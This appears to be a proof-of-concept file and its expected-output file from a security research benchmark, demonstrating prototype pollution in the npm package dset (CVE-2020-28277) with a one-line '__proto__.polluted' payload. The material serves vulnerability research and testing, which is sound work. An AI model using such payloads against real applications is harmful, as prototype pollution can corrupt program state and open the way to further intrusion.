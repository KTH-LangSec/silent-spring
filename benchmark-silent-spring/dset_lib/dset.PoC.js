//https://www.whitesourcesoftware.com/vulnerability-database/CVE-2020-28277
  const dset = require("dset");
  dset({}, "__proto__.polluted", "yes");
