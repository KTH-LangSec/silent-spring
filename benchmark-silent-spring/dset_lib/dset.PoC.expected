node_modules/dset/dist/dset.js:6:18